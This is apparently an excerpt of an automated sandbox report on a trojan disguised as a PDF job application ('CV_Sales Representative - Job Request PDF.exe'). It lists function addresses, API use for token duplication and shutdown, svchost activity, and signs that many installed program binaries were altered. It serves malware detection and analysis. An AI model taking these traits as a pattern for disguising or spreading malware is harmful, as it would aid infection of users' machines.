            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00458310
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004651BD
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\5b796eff430b0ac5.binJump to behavior
            Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0040E6A00_2_0040E6A0
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0042D9750_2_0042D975
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0040FCE00_2_0040FCE0
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004221C50_2_004221C5
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004362D20_2_004362D2
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004803DA0_2_004803DA
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0043242E0_2_0043242E
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004225FA0_2_004225FA
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0045E6160_2_0045E616
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004166E10_2_004166E1
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0043878F0_2_0043878F
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004368440_2_00436844
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004808570_2_00480857
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004188080_2_00418808
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004688890_2_00468889
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0042CB210_2_0042CB21
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00436DB60_2_00436DB6
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00416F9E0_2_00416F9E
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004130300_2_00413030
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0042F1D90_2_0042F1D9
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004231870_2_00423187
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004012870_2_00401287
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004214840_2_00421484
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004155200_2_00415520
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004276960_2_00427696
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004157600_2_00415760
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004219780_2_00421978
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00525CC80_2_00525CC8
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00487DDB0_2_00487DDB
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00421D900_2_00421D90
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0042BDA60_2_0042BDA6
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0040DF000_2_0040DF00
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00413FE00_2_00413FE0
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00B371F00_2_00B371F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418BE33_2_00418BE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004028C03_2_004028C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042F1633_2_0042F163
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004031C03_2_004031C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004011D03_2_004011D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004104303_2_00410430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004104333_2_00410433
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004024933_2_00402493
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004024A03_2_004024A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402D5D3_2_00402D5D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402D603_2_00402D60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004045693_2_00404569
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416DEE3_2_00416DEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416DF33_2_00416DF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004106533_2_00410653
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E6293_2_0040E629
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E6333_2_0040E633
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040475E3_2_0040475E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E77E3_2_0040E77E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E7CC3_2_0040E7CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E7833_2_0040E783
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4E3F03_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B003E63_2_03B003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFA3523_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC02C03_2_03AC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE02743_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF41A23_2_03AF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B001AA3_2_03B001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF81CC3_2_03AF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A301003_2_03A30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADA1183_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AC81583_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD20003_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3C7C03_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A407703_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A647503_2_03A64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5C6E03_2_03A5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B005913_2_03B00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A405353_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEE4F63_2_03AEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE44203_2_03AE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF24463_2_03AF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF6BD73_2_03AF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFAB403_2_03AFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3EA803_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A429A03_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B0A9A63_2_03B0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A569623_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A268B83_2_03A268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A6E8F03_2_03A6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4A8403_2_03A4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A428403_2_03A42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABEFA03_2_03ABEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4CFE03_2_03A4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A32FC83_2_03A32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A82F283_2_03A82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A60F303_2_03A60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE2F303_2_03AE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB4F403_2_03AB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A52E903_2_03A52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFCE933_2_03AFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFEEDB3_2_03AFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFEE263_2_03AFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40E593_2_03A40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A58DBF3_2_03A58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3ADE03_2_03A3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4AD003_2_03A4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADCD1F3_2_03ADCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE0CB53_2_03AE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A30CF23_2_03A30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A40C003_2_03A40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A8739A3_2_03A8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF132D3_2_03AF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2D34C3_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A452A03_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE12ED3_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5B2C03_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4B1B03_2_03A4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A7516C3_2_03A7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2F1723_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B0B16B3_2_03B0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF70E93_2_03AF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFF0E03_2_03AFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEF0CC3_2_03AEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A470C03_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFF7B03_2_03AFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF16CC3_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A856303_2_03A85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADD5B03_2_03ADD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B095C33_2_03B095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF75713_2_03AF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFF43F3_2_03AFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A314603_2_03A31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5FB803_2_03A5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB5BF03_2_03AB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A7DBF93_2_03A7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFFB763_2_03AFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADDAAC3_2_03ADDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A85AA03_2_03A85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1AA33_2_03AE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEDAC63_2_03AEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB3A6C3_2_03AB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFFA493_2_03AFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF7A463_2_03AF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD59103_2_03AD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A499503_2_03A49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5B9503_2_03A5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A438E03_2_03A438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAD8003_2_03AAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFFFB13_2_03AFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A41F923_2_03A41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A03FD23_2_03A03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A03FD53_2_03A03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFFF093_2_03AFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A49EB03_2_03A49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5FDC03_2_03A5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF7D733_2_03AF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A43D403_2_03A43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF1D5A3_2_03AF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AFFCF23_2_03AFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AB9C323_2_03AB9C32
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load DriverJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: SecurityJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03AAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A87E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03ABF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03A75130 appears 58 times
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: String function: 00420AE3 appears 70 times
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: String function: 00407DE1 appears 35 times
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: String function: 00428900 appears 42 times
            Source: updater.exe0.1.drStatic PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
            Source: OneDriveSetup.exe.1.drStatic PE information: Resource name: PAYLOAD type: Microsoft Cabinet archive data, many, 47694794 bytes, 767 files, at 0x44 +A "adal.dll" +A "alertIcon.png", flags 0x4, number 1, extra bytes 20 in head, 6100 datablocks, 0x1503 compression
            Source: pwahelper.exe0.1.drStatic PE information: Number of sections : 12 > 10
            Source: msedge_proxy.exe.1.drStatic PE information: Number of sections : 12 > 10
            Source: setup.exe.1.drStatic PE information: Number of sections : 13 > 10
            Source: elevation_service.exe.1.drStatic PE information: Number of sections : 12 > 10
            Source: msedgewebview2.exe.1.drStatic PE information: Number of sections : 14 > 10
            Source: pwahelper.exe.1.drStatic PE information: Number of sections : 12 > 10
            Source: msedge_pwa_launcher.exe.1.drStatic PE information: Number of sections : 13 > 10
            Source: identity_helper.exe.1.drStatic PE information: Number of sections : 12 > 10
            Source: ie_to_edge_stub.exe.1.drStatic PE information: Number of sections : 11 > 10
            Source: msedge_proxy.exe0.1.drStatic PE information: Number of sections : 12 > 10
            Source: notification_click_helper.exe.1.drStatic PE information: Number of sections : 13 > 10
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1173252696.00000000042E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CV_Sales Representative - Job Request PDF.exe
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1172078278.000000000434D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CV_Sales Representative - Job Request PDF.exe
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1163229529.0000000003ED0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs CV_Sales Representative - Job Request PDF.exe
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1180269056.0000000004220000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs CV_Sales Representative - Job Request PDF.exe
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1167219276.0000000003F20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs CV_Sales Representative - Job Request PDF.exe
            Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
            Source: CV_Sales Representative - Job Request PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: CV_Sales Representative - Job Request PDF.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: plugin-container.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: private_browsing.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: javaw.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: javaws.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jjs.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jp2launcher.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: keytool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: kinit.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: klist.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: updater.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: ktab.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: orbd.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Au3Info.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: pack200.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Au3Info_x64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AutoIt3Help.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AutoIt3_x64.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: SciTE.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: updater.exe0.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: AdobeARMHelper.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: elevation_service.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: maintenanceservice.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msdtc.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: msiexec.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: PerceptionSimulationService.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: perfhost.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: policytool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: rmid.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: rmiregistry.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: servertool.exe.1.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
